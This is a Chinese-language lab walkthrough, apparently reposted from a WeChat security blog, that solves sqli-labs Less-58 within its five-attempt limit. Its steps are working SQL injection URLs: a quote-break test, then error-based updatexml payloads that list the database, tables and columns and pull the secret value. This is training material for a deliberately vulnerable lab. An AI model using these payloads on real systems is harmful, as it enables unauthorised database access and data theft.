SQL-Labs Less-58

admin 2024年1月29日22:44:59评论8 views字数 1064阅读3分32秒阅读模式

Sqli-labs-Less-58

SQL-Labs Less-58

本关对输入次数的限制为5次

查找注入点(一次试对)

http://www.web.com/sql/Less-58/?id=1'--+

SQL-Labs Less-58

查看当前库和所有数据库

http://www.web.com/sql/Less-58/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata--+

SQL-Labs Less-58

并没有任何反应,尝试使用报错注入

查看当前数据库

http://www.web.com/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

SQL-Labs Less-58

再次我已经使用了五次,干脆再错一次重置一下数据

查看当前数据库

http://www.web.com/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

SQL-Labs Less-58

数据库并没有发生改变

查看所有表

http://www.web.com/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

SQL-Labs Less-58

查看字段

http://www.web.com/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='1crgm7zd79'),0x7e),1)--+

SQL-Labs Less-58

查看密码

http://www.web.com/sql/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_BLS3) from challenges.1crgm7zd79),0x7e),1)--+

SQL-Labs Less-58

将得到的密码输入到下面的方框中进行验证

SQL-Labs Less-58

成功

SQL-Labs Less-58

声明
本教程仅提供技术分享,不得用于非法用途
利用此文所造成的任何直接或间接的损失,文章作者不承担任何责任
网络安全你我他,维护安全靠大家

原文始发于微信公众号(龙蜀安全):SQL-Labs Less-58

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月29日22:44:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQL-Labs Less-58http://cn-sec.com/archives/1021585.html

发表评论

匿名网友 填写信息